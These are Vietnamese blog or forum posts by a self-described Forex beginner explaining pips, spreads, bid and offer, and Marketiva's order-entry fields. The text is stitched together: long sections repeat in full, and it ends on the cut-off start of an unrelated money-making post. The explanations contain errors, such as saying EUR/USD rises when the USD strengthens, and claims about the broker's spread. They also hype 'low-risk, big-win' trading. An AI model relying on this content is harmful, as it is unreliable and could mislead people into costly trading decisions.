Ví dụ có một người kêu giá xuống và một người kêu giá lên ở Forex ngay giá thị truòng là 1,2547, và khi tỉ giá thị trường tăng lên 1,2550 tức là người kêu giá lên đã đoán đúng nó sẽ lên nên anh ta thắng được 3 điểm ( và ở đây có một khái niện nữa là " PIP ", trong trường hợp này 3 điểm sẽ là 3 PIP ) Khi đó người kêu giá hạ sai, đã thua 3 PIP, và 3 PIP này đã thuộc về người kêu lên......hehehe... Marketiva huề tiền, đúng nè ? Mà zậy thì " ngu " quá cho nên nó chơi " hỗn ", giở " giọng cha " ra , ko cần bít thằng nào thắng hay thua, kệ tụi bây, nó lấy trước mỗi thằng 1 Spread zậy là nó có 6 PIP bỏ túi ....kekeke , tuy` thuộc vào offer và bid mà mỗi spread sẽ là bi nhiu PIP.... huhuhu. Nó thì lúc nào cũng cười còn minh thì lúc nào cũng khóc..... Và để thắng được 1 PIP thì ta cần phải chờ nó tăng lên hoặc giảm xuống 4 PIP, và từ giá trị trừ (-) 3 ban đầu để leo lên đến giá trị cộng (+) 1 và hơn nữa là cái khoảng cách cần phải được rút ngắn do đã được "trãi rộng ra" từ khi bắt đầu ! Vâng đó chính là " Spread "
Và khi tổng số lượng quantity buy và sell ở mức gần ngang bằng nhau, kết hợp với giá của thị trường nó sẽ nhảy điểm trên bảng Forex Rates, và sau đây tui sẽ giới thiệu cho tất cả các bạn biết cách nhìn bảng Forex Rates qua màu sắc, khi bạn thấy màu sắc chuyển sang màu đen có nghĩa là tổng số lượng quantity đang ngang bằng nhau, màu xanh có nghĩa là số lượng kêu lên nhiều hơn số lượng kêu xuống còn màu đỏ thì ngược lại........ và cái giá trị " last " chính là giá trị của lần kêu lên hay kêu xuống sau cùng ... và căn cứ vào đó Trader có thể bán ra hay mua vào tiếp, và giá trị kêu sau chót sẽ được đặt lên ! yeah đó lại chính là bid và offer của phiên mua bán sau, cứ mỗi lần mua bán nó lại lấy vào 2 Spread từ người mua và người bán ! và chắc chắn một diều nó chỉ có lời mà thui, và chúng ta sẽ có người lời và người lỗ, hoặc chỉ có lời và khi đó lỗ nhiều nhất chính là loại tiền tệ bị mất giá đó bạn, và quốc gia nắm giữ nó chính là người lỗ nhất
Giờ thì bạn biết là tại sao nó không cần bõ ra một "cắc" nào hết đúng ko !
Tui sẽ giới thiệu cho các bạn cách nhìn xu thế tăng giảm ở Forex ( ko phải ở thị trường nhưng phần nào mình cũng có thể biết được biến động đang xảy ra ở thị trường thật và Forex chỉ là một thị trường ảo ! Zậy theo bạn câu nói " hãy quên hết đi ! " lúc nãy của tui là như thế nào ? Tất cả là ở bạn đó ! hii`... )
Ví dụ : Khi ta nhìn thấy số lượng người mua bán USD / JPY giảm và GBP / USD tăng thì rất (vâng là "rất") có thể USD đang giảm giá, và càng liên tục nhưng trạng thái màu sắc của EUR/USD vẫn chưa chuyển đổi thì tại sao ko chớp cơ hội mà mà mua EUR / USD lên giá chứ...đúng nè
Nhưng kỹ thuật và kinh nghiệm là do chúng ta tích lũy thui các bạn àh !!! Do chỉ mới bước chân tập tành chơi Forex có 72h liên tục vừa qua nên kinh nghiện minibom còn hơi kém, nếu có gì sai sót mong bà con anh chị em chú bác cô dì cậu mợ bõ qua cho...hehehe.....
Còn một số kỹ thuật đầu tư với mức độ mạo hiểm ko cao nhưng thắng lớn, có thời gian mình sẽ post bài chia sẽ cùng các bạn. Hiện nay minibom đang tìm hiểu về indicator và một số kỹ thuật phân tích chứng khoán như : RSI, MACD sẽ post sau ... Nếu có cao thủ nào hiểu rõ về nó có thể chia sẽ với mọi người để cùng học hỏi, trao đổi kinh nghiệm..OK
Và đã là một Trader chuyên nghiệp điều quan trọng nhất của chúng ta đó là phải nắm bắt và phân tích tình hình biến đông nhanh chóng liên tuc của thế giới và chớp thời cơ đúng lúc........ và đó là Forex Trader !!! Các site có thể tham khảo :http://www.forexnews.com, http://www.fxstreet.com/index.asp
Forex Trading
Như đã hứa, hôm nay minibom sẽ giới thiệu với các bạn một số kỹ thuật cơ bản ở "sân chơi" Forex, yeah ! Đúng zậy là "sân chơi" thưa các bạn ! một sân chơi có tầm cỡ không tưởng tượng , ví dụ như Marketiva là một sân chơi tập trung hàng trăm, hàng ngàn công ty với quy mô lớn nhỏ khác nhau, với tổng nguồn vốn trao đổi ( trade ) hơn 1400 tỉ USD, hic... thật là một con số khổng lồ ... Nếu như bạn nắm trong tay một số tiền như vậy, tui thử hỏi bạn sẽ làm gì với nó ? hii`..... nhưng mấy hôm trước tui có nói chuyện với anh bạn admin của Marketiva và rất bất ngờ khi hắn trả lời lại một câu hỏi của tui " nếu như tui muốn push up ( đẩy giá lên ) hay push drop ( đẩy giá xuống ) 1 PIP thì tui cần phải tung ra lệnh mua hay bán với số lượng quantity là bao nhiêu ? ", hắn nói một cách rất tự nhiên " nếu như bạn có 500 triệu USD, bạn có thể ! " và tui đã trả lời là " OK, i will !!! ", zậy theo bạn với một số tiền trade như đã nêu thì làm một phép tính đơn giản bạn sẽ thấy ngay là mức độ dao động ở tình trạng thị trường yên lặng ( vâng là " yên lặng " ), sẽ đến mức nào ! Đúng nè ! " Nhưng những gì tui nói nãy giờ có liên quan gì đến kỹ thuật ? " Nếu như bạn đang đặt câu hỏi đó cho tui, rất vui lòng khuyên bạn nên đọc lại cái phần mở bài này...hehehe
Ok, bây giờ sẽ đi vào chi tiết bạn nha !!!
Trước tiên bạn cần hiểu rõ cách đặt lệnh như thế nào ? tác dụng của nó ra sao ? và tác động của nó như thế nào đối với tình hình biến động ? Nhiều quá phải ko bạn ? hii`......
Minibom đã có giới thiệu qua hai khái niệm " bid " và " offer " ở bài viết trước " Bản chất Forex Trading " ( nếu chưa rõ bạn có thể xem lại nhé , ví dụ khi bạn đã nắm được tình hình giá cả của một loại tiền tệ nào đó và bạn biết chắc rằng nó sẽ lên hay xuống khi đó bạn sẽ đặt lệnh mua và có hai lệnh mua đó là " buy long " ( tạm dịch là " mua lên " ) và buy short thì ngược lại ! Vậy đặt lệnh mua sao đây ? vì bạn sẽ không thấy cái nào là "long" hay "short" ở khung đặt lệnh đâu, hiii` ... Đông-quơ-zi ( Dont worry ) !!! Đầu tiên bạn sẽ chọn một loại tiền tệ nào đó, ví dụ USD/JPY hén ! Click chuột vào dòng chữ "USD/JPY" sẽ hiện ra một cái khung đặt lệnh :
" Instrument " : bạn sẽ chọn loại tiền tệ mà mình đã dự định trước, và mặc định ở đây là khi bạn click chuột lên loại tiền tệ nào thì loại đó sẽ hiện lên trong khung này
" Price " : là ô đặt giá bạn muốn mua hay bán tại giá bạn chọn, và menu này chỉ có hiệu lưc khi bạn chọn " Price Type " là " Stop " hay " Limit ", Có nghĩa là khi nào đúng giá bạn chọn nó sẽ auto mua hay bán cho bạn.
" Quantity " : là số lượng "cổ phần" mà bạn sẽ mua, ở Marketiva tính theo tỉ lệ 1 : 100, co' nghĩa là 1$ bạn sẽ mua được 100quan.
" Exit Stop-Loss " : là giới hạn tiền lỗ, ví dụ khi bạn có 30$, mà bạn đã mua hết 20$ là 2000quan mua lên chẳng hạn , bạn sẽ còn 10$ trong account của bạn để bù lỗ khi giá xuống, nghĩa là bạn không muốn mình lỗ quá 5$, khi đó bạn sẽ tính toán và biết đến điểm nào thì vượt quá 5$, hãy đặt cái điểm đó vào đây và khi đến đó nó sẽ tự đóng lệnh ( " Close " ) của bạn lại và tài khoản của bạn còn 25$, nếu bạn ko làm zậy, khi giá hạ mạnh có thể bạn sẽ lỗ nhiều hơn nữa.......lúc đó sẽ chẳng còn đươc 25$ đâu...hehehe... đây chỉ là ví dụ thui bạn ơi, chứ thực tế sẽ mất nhiều hơn nữa ......kekekekeke... Cái này thì Buontaiviem rành hơn minibom nhìu.......đúng nè !!!
" Exit Target " : là giới hạn tiền lời đó ( hic... " lời " mà cũng có giới hạn nữa sao ? Còn bạn , bạn nghĩ sao ? ) Và cách tính toán cũng như mức độ chính xác đặt lệnh "Close" giống như Exit Stop-Loss chỉ xảy ra khi " Price Type " là " Stop " thui , còn nếu không bạn phải tự đặt lệnh " Close " đấy, bạn mà không tự ra lệnh thì đừng có " tiếc rẻ " nha ! Không kịp đâu !
" Desk " là lọai tiền bạn sẽ dùng để đầu tư, và Marketiva rất hào phóng nó sẽ tặng cho bạn 10000 USD " ảo " khi bạn bắt đầu tập chơi, và đúng như tên gọi của nó " virtual " có nghĩa là nó sẽ chẳng làm được gì hết, chỉ dùng đề luyện tập cách chơi thui ! Cũng chẳng thể lấy xài được....hic.... nhưng nếu là " Live " thì khác bạn nhé, vì đó hoàn toàn là tiền thật, thao tác 10000 USD vitual có lẽ bạn sẽ rất nhuyễn, nhưng minibom dám cá nếu là 10000 live thì chắc chắn bạn sẽ " run " tay đó ........ hahahaha... Đúng nè Buontaiviem ! hii`
" Buy / Sell " : Nếu như bạn chon Buy có nghĩa là bạn mua giá lên đấy ( Buy long ), hết lo lắng rùi hén ! Còn sell là buy short đó...
" Price Type " : Mức độ chính xác khi ra lệnh, và theo minibom " Stop " là chính xác nhất !
" Duration Type " : zầy hén " giả bộ " bạn là " thần Forex " đi, bạn biết trước, ko phải là đoán àh nha, hôm đó nó sẽ dừng ở mức nào và chắc chắn khi đó bạn sẽ hốt bạc ! Hura ! ( Nhớ báo tui bít với nha, hỗm nay tui với Buontaiviem loss mấy ngàn $ rùi đó chỉ chờ tin của bạn thui ) Bạn cứ ra lệnh cho nó " Good till end date " ! Con nếu ko muốn zậy thì có thể chọn " Good till cancelled ", nghỉa là nó chỉ thực hiện lệnh "Close" khi bạn ra lệnh "Close " thui ! Hoặc có thể chọn " Immediate or cancelled " khi nó khớp với giới hạn bạn đã chọn ở Stop-loss và Exit-target.... túm lại có rất nhiều cách...
" Quantity Type " : là kiểu quantity, ví dụ khi bạn muốn mua 10000quan ở mức 1,2547 chẳng hạn, thì khi có thằng nào đó bán đúng giá và đúng số lượng như bạn muốn thì bạn mới có thể mua được, nhưng ở một sân chơi lớn tầm cỡ như Marketiva thì khác biệt giữa " Full " ( mua một lần ) và " Part " ( gom tập trung ) không nhiều lắm !
" Text " : cái này hả ? thông thường tui ko sử dụng nên chẳng biết là làm cái gì nữa nhưng tui nghĩ cái này sẽ báo cho người khác biết là mình đang cần mua số lượng bi nhiu và giá từ mức nào đến mức nào, nếu họ biết có thể sẽ bán cho mình khi họ không muốn lời hoặc lỗ nhìu ! Nhưng bi giờ chưa phải là lúc để chơi cái này..... why ? " bí mật " không thể " bật mí ".... nhưng chức năng này rất hay............hahahahaha. " Chiu " cuối cùng đó !!! Sorri all !
Bingo ! Cái basic thì là zậy đó, bi giờ tui sẽ nói sơ qua cái tác động của nó !
Đầu tiên bạn cần phải biết " phiên làm việc " là gi ? Mỗi lần bạn đặt lệnh "Open và cho đến luc Close" thì được xem là " một phiên làm việc " ! Tại sao tui lại dùng động từ " tác động " ? Một " phiên làm việc " thường bắt đầu bằng lệnh " buy " hay " sell " và khi kết thúc sẽ là lệnh ngược lại ! Bạn hĩu rùi chứ ! " Buy-Sell " hay "Sell-Buy" cũng được xem là một " phiên làm việc "
........................Buy-Sell....Sell-Buy....Buy-Sell....Sell-Buy....Buy-Sell.....Sell-Buy....................
Vâng, ở đây minibom nói đến khái niệm " Trade " : là " trao đổi ", đúng như tên gọi của nó, cho nên thị trường Forex có biến đổi như thế nào là do Trader điều khiển đó bạn àh , và tỉ giá chỉ là một phần nhỏ của cuộc chơi mà thui ........ Hy vọng bạn sẽ nắm bắt được kỹ thuật cũng như bản chất của Forex với hai bài viết vừa qua !
Vẫn là câu nói đó " FOREX là một nghệ thuật và TRADER cũng là một nghệ sĩ !!! "
hihihi ... Minibom nhớ lại thiệt là mắc cười khi 3 hôm trước Buontaiviem gọi điện thoại nói với minibom là " ông chơi thử Forex đi ! " Hic... minibom cứ nghĩ là ông này "xúi" mình đi đọc mail của ông bạn thân Forest đang ở Vũng Tàu chứ ! hii` ... ai mà biết đâu .....hahaha
Cho nên vẫn là câu nói đó : " nếu như có cao thủ nào chưa vừa ý với bài viết trên rất hy vọng tiếp nhận được ý kiến của các bạn vì minibom không được thông minh cho lém với lại cũng chỉ là một newbie mà thui nên sai sót nhất định là không thể tránh khỏi , rất mong được chia sẽ với các bạn "
Nhiều người khi mới làm quen với Forex, cứ nghĩ là đơn giản mà thưc chất không hề biết đến bản chất thực sự của nó, zậy bản chất của Forex là gì ? Yeah !
Trước nhất chúng ta cần phải hiểu chúng ta là ai ở sân chơi Forex, lấy vì dụ khi bạn thấy tỉ giá sau :
* EUR / USD = 1,2547 điều này có nghĩa là gì ? và con số này do đâu mà có ?
Câu trả lời là tỉ giá chênh lệch giữa 2 loại tiền tệ : đồng Euro và USD là 1,2547 (có nghĩa 1 đồng Euro có thể mua được 1,2547 đồng USD ! OK ! ) Và con số này là do giá trị của từng loại tiền tệ ở từng thời điểm khác nhau mà một quốc gia hay một khối liên minh nào đó như EU chẳng hạn phát triển như thế nào so với các quốc gia khác sẽ tạo ra tỉ giá đó ( và ở đây tui ko đi chuyên sâu vào lĩnh vưc tiền tệ và nếu như các bạn thật sự muốn biết tui có thể trả lời cho bạn )
* Lấy ví dụ ở trên : EUR / USD = 1,2547 cái tỉ giá này có thể tăng mà cũng có thể giảm ở nhiều trường hợp :
Khi Euro hạ xuống mà USD ko đổi tỉ giá này sẽ giảm xuống và khi Euro tăng mà USD ko đổi thì tỉ giá này tăng lên
Khi USD hạ xuống mà EUR ko đổi tỉ giá này sẽ tăng lên và khi USD tăng mà EUR ko đổi thì tỉ giá này tăng lên
Nhưng thưc tế cũng có thể cả hai cùng tăng hoặc cùng giảm và một trường hợp khác là một cái tăng một cái giảm
Và tùy trường hợp mà nó sẽ tăng giảm với mức độ dao động như thế nào !
Và cái tỉ số này sẽ tăng hay giảm là do mức độ đầu tư của tất cả mọi người trên thế giới vào một loại tiền tệ nào đó và được các hệ thống ngân hàng trên khắp thế giới tính toán chi tiết một cách liên tục. Ví dụ khi đồng USD hạ giá và người ta biết rằng nó sẽ tăng trở lại do theo dõi tin tức tức và tình hình biến động của thế giới, zậy còn chờ gì nữa mà mà ko mua USD để trữ khi giá thấp và chờ khi giá tăng lên bán ra họ sẽ có lời, đúng không ? hìi
Nhưng họ là ai, họ là người đã tạo ra con số tỉ giá đó đó thưa các bạn, và tùy sở thích của bạn mà bạn sẽ chọn cho mình là ai !
Nhưng cái chính ở đây tui không muốn nói đến những người " chơi bên trong " yeah là " chơi bên trong " ! hìi ... mà tui chỉ muốn nói đến với các bạn đó là " Trader ", nếu bạn thực sự muốn làm " Trader " vâng bạn sẽ là người " chơi vòng ngoài ".
OK ! Tới đây bạn đã hiểu hết vấn đề chưa ? Nếu như bạn đã rõ rùi thì ..... hãy quên hết đi ! Và tại sao như zậy ? câu hỏi đó sẽ do bạn tự trả lời.......hii` !!!
" FOREX là một nghệ thuật và TRADER cũng là một nghệ sĩ !!! "
And now , Forex Trader bắt đầu ..................
Đầu tiên chúng ta cần biết cái quan trọng nhất ở Forex là gì ? Đó là " Quantity " ( kể từ đây khái niệm này sẽ được hĩu là "quan" OK )
Đó là một loại đơn vị để tính toán tiền lãi hay lỗ ở Forex của Trader, hic....tui ko bit nên gọi là cái gì nữa đây, thui kệ tạm gọi là "cổ phần" cho dễ hĩu đi hén .......hehehe
Và 1$ sẽ mua được 100quan ở Marketiva
Lấy lại tỉ số này EUR / USD = 1,2547 nếu sau khi được tính toán con số này tăng lên là 1,2548
Nghĩa là đã tăng lên bi nhiu ? đố bạn ! Nói chơi thui...hehehe : 1,2548 - 1,2547 = 0,0001 đúng nè ? yeah
Nếu bạn dùng 100$ mua 10.000quan (10k) thì số tiền của bạn tăng lên là : 10k * 0,0001 = 1$ ( wow ! sướng chưa ! ) Nhưng đâu có đơn giản zậy ! Vì đâu có ai ngồi không mà " khờ dại " dâng tặng cho bạn 1$ khi thị truòng lên, đúng nè ? cứ mỗi thằng 1 xèng (1$) thì sẽ cần bi nhiu mới đủ cho cái lũ trader " ốm o già nua " kia !
Tui nhớ cách đây 3 ngày khi bắt đầu khi tìm hĩu về Forex, có đọc qua một bài viết nào đó và có một ai đó hỏi rằng " Zậy thì lấy tiền đâu Marketiva trả cho mình ? "... hic....... Bạn nghĩ rằng nó cần lấy tiền của nó trả cho mình sao ????? Một câu trả lời cho bạn biết là " nó sẽ ko bõ một xu tiền túi nào của nó để trả cho bạn hết !!! " Why ????????
Tiếp theo tui sẽ đưa ra cho bạn một khái niệm gọi là " Spread " : theo nghĩa dịch của Oxford Dictionary thì được hĩu là " khỏang rộng trãi ra "... huhuhu là cái "giống" gì đây ? hehe...
Để hĩu " Spread ", chúng ta cần biết đến hai khái niệm trong kỹ thuật đấu giá nữa là " Bid " và " Offer "
* Bid : là đặt giá (khởi đầu kêu giá xuống)
* Offer : là trả ( và với Forex được hĩu là trả thêm ) giá (khởi đầu kêu giá lên)
Ví dụ khi ta thấy tỉ giá của EUR / USD = 1,2547 Và Bid của nó là 1,2544, Offer là 1,2547
Và Spread = Offer - Bid , trường hợp nay` la` 1,2547 - 1,2544 = 0,0003, tức là 2 cái giá này đã hơn kém nhau 3 đơn vị và 1 Spread ở đây là 3.
Ví dụ có một người kêu giá xuống và một người kêu giá lên ở Forex ngay giá thị truòng là 1,2547, và khi tỉ giá thị trường tăng lên 1,2550 tức là người kêu giá lên đã đoán đúng nó sẽ lên nên anh ta thắng được 3 điểm ( và ở đây có một khái niện nữa là " PIP ", trong trường hợp này 3 điểm sẽ là 3 PIP ) Khi đó người kêu giá hạ sai, đã thua 3 PIP, và 3 PIP này đã thuộc về người kêu lên......hehehe... Marketiva huề tiền, đúng nè ? Mà zậy thì " ngu " quá cho nên nó chơi " hỗn ", giở " giọng cha " ra , ko cần bít thằng nào thắng hay thua, kệ tụi bây, nó lấy trước mỗi thằng 1 Spread zậy là nó có 6 PIP bỏ túi ....kekeke , tuy` thuộc vào offer và bid mà mỗi spread sẽ là bi nhiu PIP.... huhuhu. Nó thì lúc nào cũng cười còn minh thì lúc nào cũng khóc..... Và để thắng được 1 PIP thì ta cần phải chờ nó tăng lên hoặc giảm xuống 4 PIP, và từ giá trị trừ (-) 3 ban đầu để leo lên đến giá trị cộng (+) 1 và hơn nữa là cái khoảng cách cần phải được rút ngắn do đã được "trãi rộng ra" từ khi bắt đầu ! Vâng đó chính là " Spread "
Và khi tổng số lượng quantity buy và sell ở mức gần ngang bằng nhau, kết hợp với giá của thị trường nó sẽ nhảy điểm trên bảng Forex Rates, và sau đây tui sẽ giới thiệu cho tất cả các bạn biết cách nhìn bảng Forex Rates qua màu sắc, khi bạn thấy màu sắc chuyển sang màu đen có nghĩa là tổng số lượng quantity đang ngang bằng nhau, màu xanh có nghĩa là số lượng kêu lên nhiều hơn số lượng kêu xuống còn màu đỏ thì ngược lại........ và cái giá trị " last " chính là giá trị của lần kêu lên hay kêu xuống sau cùng ... và căn cứ vào đó Trader có thể bán ra hay mua vào tiếp, và giá trị kêu sau chót sẽ được đặt lên ! yeah đó lại chính là bid và offer của phiên mua bán sau, cứ mỗi lần mua bán nó lại lấy vào 2 Spread từ người mua và người bán ! và chắc chắn một diều nó chỉ có lời mà thui, và chúng ta sẽ có người lời và người lỗ, hoặc chỉ có lời và khi đó lỗ nhiều nhất chính là loại tiền tệ bị mất giá đó bạn, và quốc gia nắm giữ nó chính là người lỗ nhất
Giờ thì bạn biết là tại sao nó không cần bõ ra một "cắc" nào hết đúng ko !
Tui sẽ giới thiệu cho các bạn cách nhìn xu thế tăng giảm ở Forex ( ko phải ở thị trường nhưng phần nào mình cũng có thể biết được biến động đang xảy ra ở thị trường thật và Forex chỉ là một thị trường ảo ! Zậy theo bạn câu nói " hãy quên hết đi ! " lúc nãy của tui là như thế nào ? Tất cả là ở bạn đó ! hii`... )
Ví dụ : Khi ta nhìn thấy số lượng người mua bán USD / JPY giảm và GBP / USD tăng thì rất (vâng là "rất") có thể USD đang giảm giá, và càng liên tục nhưng trạng thái màu sắc của EUR/USD vẫn chưa chuyển đổi thì tại sao ko chớp cơ hội mà mà mua EUR / USD lên giá chứ...đúng nè
Nhưng kỹ thuật và kinh nghiệm là do chúng ta tích lũy thui các bạn àh !!! Do chỉ mới bước chân tập tành chơi Forex có 72h liên tục vừa qua nên kinh nghiện minibom còn hơi kém, nếu có gì sai sót mong bà con anh chị em chú bác cô dì cậu mợ bõ qua cho...hehehe.....
Còn một số kỹ thuật đầu tư với mức độ mạo hiểm ko cao nhưng thắng lớn, có thời gian mình sẽ post bài chia sẽ cùng các bạn. Hiện nay minibom đang tìm hiểu về indicator và một số kỹ thuật phân tích chứng khoán như : RSI, MACD sẽ post sau ... Nếu có cao thủ nào hiểu rõ về nó có thể chia sẽ với mọi người để cùng học hỏi, trao đổi kinh nghiệm..OK
Và đã là một Trader chuyên nghiệp điều quan trọng nhất của chúng ta đó là phải nắm bắt và phân tích tình hình biến đông nhanh chóng liên tuc của thế giới và chớp thời cơ đúng lúc........ và đó là Forex Trader !!! Các site có thể tham khảo :http://www.forexnews.com, http://www.fxstreet.com/index.asp
Forex Trading
Như đã hứa, hôm nay minibom sẽ giới thiệu với các bạn một số kỹ thuật cơ bản ở "sân chơi" Forex, yeah ! Đúng zậy là "sân chơi" thưa các bạn ! một sân chơi có tầm cỡ không tưởng tượng , ví dụ như Marketiva là một sân chơi tập trung hàng trăm, hàng ngàn công ty với quy mô lớn nhỏ khác nhau, với tổng nguồn vốn trao đổi ( trade ) hơn 1400 tỉ USD, hic... thật là một con số khổng lồ ... Nếu như bạn nắm trong tay một số tiền như vậy, tui thử hỏi bạn sẽ làm gì với nó ? hii`..... nhưng mấy hôm trước tui có nói chuyện với anh bạn admin của Marketiva và rất bất ngờ khi hắn trả lời lại một câu hỏi của tui " nếu như tui muốn push up ( đẩy giá lên ) hay push drop ( đẩy giá xuống ) 1 PIP thì tui cần phải tung ra lệnh mua hay bán với số lượng quantity là bao nhiêu ? ", hắn nói một cách rất tự nhiên " nếu như bạn có 500 triệu USD, bạn có thể ! " và tui đã trả lời là " OK, i will !!! ", zậy theo bạn với một số tiền trade như đã nêu thì làm một phép tính đơn giản bạn sẽ thấy ngay là mức độ dao động ở tình trạng thị trường yên lặng ( vâng là " yên lặng " ), sẽ đến mức nào ! Đúng nè ! " Nhưng những gì tui nói nãy giờ có liên quan gì đến kỹ thuật ? " Nếu như bạn đang đặt câu hỏi đó cho tui, rất vui lòng khuyên bạn nên đọc lại cái phần mở bài này...hehehe
Ok, bây giờ sẽ đi vào chi tiết bạn nha !!!
Trước tiên bạn cần hiểu rõ cách đặt lệnh như thế nào ? tác dụng của nó ra sao ? và tác động của nó như thế nào đối với tình hình biến động ? Nhiều quá phải ko bạn ? hii`......
Minibom đã có giới thiệu qua hai khái niệm " bid " và " offer " ở bài viết trước " Bản chất Forex Trading " ( nếu chưa rõ bạn có thể xem lại nhé , ví dụ khi bạn đã nắm được tình hình giá cả của một loại tiền tệ nào đó và bạn biết chắc rằng nó sẽ lên hay xuống khi đó bạn sẽ đặt lệnh mua và có hai lệnh mua đó là " buy long " ( tạm dịch là " mua lên " ) và buy short thì ngược lại ! Vậy đặt lệnh mua sao đây ? vì bạn sẽ không thấy cái nào là "long" hay "short" ở khung đặt lệnh đâu, hiii` ... Đông-quơ-zi ( Dont worry ) !!! Đầu tiên bạn sẽ chọn một loại tiền tệ nào đó, ví dụ USD/JPY hén ! Click chuột vào dòng chữ "USD/JPY" sẽ hiện ra một cái khung đặt lệnh :
" Instrument " : bạn sẽ chọn loại tiền tệ mà mình đã dự định trước, và mặc định ở đây là khi bạn click chuột lên loại tiền tệ nào thì loại đó sẽ hiện lên trong khung này
" Price " : là ô đặt giá bạn muốn mua hay bán tại giá bạn chọn, và menu này chỉ có hiệu lưc khi bạn chọn " Price Type " là " Stop " hay " Limit ", Có nghĩa là khi nào đúng giá bạn chọn nó sẽ auto mua hay bán cho bạn.
" Quantity " : là số lượng "cổ phần" mà bạn sẽ mua, ở Marketiva tính theo tỉ lệ 1 : 100, co' nghĩa là 1$ bạn sẽ mua được 100quan.
" Exit Stop-Loss " : là giới hạn tiền lỗ, ví dụ khi bạn có 30$, mà bạn đã mua hết 20$ là 2000quan mua lên chẳng hạn , bạn sẽ còn 10$ trong account của bạn để bù lỗ khi giá xuống, nghĩa là bạn không muốn mình lỗ quá 5$, khi đó bạn sẽ tính toán và biết đến điểm nào thì vượt quá 5$, hãy đặt cái điểm đó vào đây và khi đến đó nó sẽ tự đóng lệnh ( " Close " ) của bạn lại và tài khoản của bạn còn 25$, nếu bạn ko làm zậy, khi giá hạ mạnh có thể bạn sẽ lỗ nhiều hơn nữa.......lúc đó sẽ chẳng còn đươc 25$ đâu...hehehe... đây chỉ là ví dụ thui bạn ơi, chứ thực tế sẽ mất nhiều hơn nữa ......kekekekeke... Cái này thì Buontaiviem rành hơn minibom nhìu.......đúng nè !!!
" Exit Target " : là giới hạn tiền lời đó ( hic... " lời " mà cũng có giới hạn nữa sao ? Còn bạn , bạn nghĩ sao ? ) Và cách tính toán cũng như mức độ chính xác đặt lệnh "Close" giống như Exit Stop-Loss chỉ xảy ra khi " Price Type " là " Stop " thui , còn nếu không bạn phải tự đặt lệnh " Close " đấy, bạn mà không tự ra lệnh thì đừng có " tiếc rẻ " nha ! Không kịp đâu !
" Desk " là lọai tiền bạn sẽ dùng để đầu tư, và Marketiva rất hào phóng nó sẽ tặng cho bạn 10000 USD " ảo " khi bạn bắt đầu tập chơi, và đúng như tên gọi của nó " virtual " có nghĩa là nó sẽ chẳng làm được gì hết, chỉ dùng đề luyện tập cách chơi thui ! Cũng chẳng thể lấy xài được....hic.... nhưng nếu là " Live " thì khác bạn nhé, vì đó hoàn toàn là tiền thật, thao tác 10000 USD vitual có lẽ bạn sẽ rất nhuyễn, nhưng minibom dám cá nếu là 10000 live thì chắc chắn bạn sẽ " run " tay đó ........ hahahaha... Đúng nè Buontaiviem ! hii`
" Buy / Sell " : Nếu như bạn chon Buy có nghĩa là bạn mua giá lên đấy ( Buy long ), hết lo lắng rùi hén ! Còn sell là buy short đó...
" Price Type " : Mức độ chính xác khi ra lệnh, và theo minibom " Stop " là chính xác nhất !
" Duration Type " : zầy hén " giả bộ " bạn là " thần Forex " đi, bạn biết trước, ko phải là đoán àh nha, hôm đó nó sẽ dừng ở mức nào và chắc chắn khi đó bạn sẽ hốt bạc ! Hura ! ( Nhớ báo tui bít với nha, hỗm nay tui với Buontaiviem loss mấy ngàn $ rùi đó chỉ chờ tin của bạn thui ) Bạn cứ ra lệnh cho nó " Good till end date " ! Con nếu ko muốn zậy thì có thể chọn " Good till cancelled ", nghỉa là nó chỉ thực hiện lệnh "Close" khi bạn ra lệnh "Close " thui ! Hoặc có thể chọn " Immediate or cancelled " khi nó khớp với giới hạn bạn đã chọn ở Stop-loss và Exit-target.... túm lại có rất nhiều cách...
" Quantity Type " : là kiểu quantity, ví dụ khi bạn muốn mua 10000quan ở mức 1,2547 chẳng hạn, thì khi có thằng nào đó bán đúng giá và đúng số lượng như bạn muốn thì bạn mới có thể mua được, nhưng ở một sân chơi lớn tầm cỡ như Marketiva thì khác biệt giữa " Full " ( mua một lần ) và " Part " ( gom tập trung ) không nhiều lắm !
" Text " : cái này hả ? thông thường tui ko sử dụng nên chẳng biết là làm cái gì nữa nhưng tui nghĩ cái này sẽ báo cho người khác biết là mình đang cần mua số lượng bi nhiu và giá từ mức nào đến mức nào, nếu họ biết có thể sẽ bán cho mình khi họ không muốn lời hoặc lỗ nhìu ! Nhưng bi giờ chưa phải là lúc để chơi cái này..... why ? " bí mật " không thể " bật mí ".... nhưng chức năng này rất hay............hahahahaha. " Chiu " cuối cùng đó !!! Sorri all !
Bingo ! Cái basic thì là zậy đó, bi giờ tui sẽ nói sơ qua cái tác động của nó !
Đầu tiên bạn cần phải biết " phiên làm việc " là gi ? Mỗi lần bạn đặt lệnh "Open và cho đến luc Close" thì được xem là " một phiên làm việc " ! Tại sao tui lại dùng động từ " tác động " ? Một " phiên làm việc " thường bắt đầu bằng lệnh " buy " hay " sell " và khi kết thúc sẽ là lệnh ngược lại ! Bạn hĩu rùi chứ ! " Buy-Sell " hay "Sell-Buy" cũng được xem là một " phiên làm việc "
........................Buy-Sell....Sell-Buy....Buy-Sell....Sell-Buy....Buy-Sell.....Sell-Buy....................
Vâng, ở đây minibom nói đến khái niệm " Trade " : là " trao đổi ", đúng như tên gọi của nó, cho nên thị trường Forex có biến đổi như thế nào là do Trader điều khiển đó bạn àh , và tỉ giá chỉ là một phần nhỏ của cuộc chơi mà thui ........ Hy vọng bạn sẽ nắm bắt được kỹ thuật cũng như bản chất của Forex với hai bài viết vừa qua !
Vẫn là câu nói đó " FOREX là một nghệ thuật và TRADER cũng là một nghệ sĩ !!! "
hihihi ... Minibom nhớ lại thiệt là mắc cười khi 3 hôm trước Buontaiviem gọi điện thoại nói với minibom là " ông chơi thử Forex đi ! " Hic... minibom cứ nghĩ là ông này "xúi" mình đi đọc mail của ông bạn thân Forest đang ở Vũng Tàu chứ ! hii` ... ai mà biết đâu .....hahaha
Cho nên vẫn là câu nói đó : " nếu như có cao thủ nào chưa vừa ý với bài viết trên rất hy vọng tiếp nhận được ý kiến của các bạn vì minibom không được thông minh cho lém với lại cũng chỉ là một newbie mà thui nên sai sót nhất định là không thể tránh khỏi , rất mong được chia sẽ với các bạn "
Con đường kiếm
tiền của newbie
Chào các bạn!
Sau 1 thời gian kiếm tiền trên mạng,tui mạn phép trình bày ý kiền của mình về con đường kiếm tiền trên mạng để cho các bạn..những người mới vào nghề khỏi bỡ ngỡ khi tiếp xúc với khối lượng thông tin trên mạng khổng lồ mà ko biết nên bắt đầu từ đâu...
Tui xin nói trước:
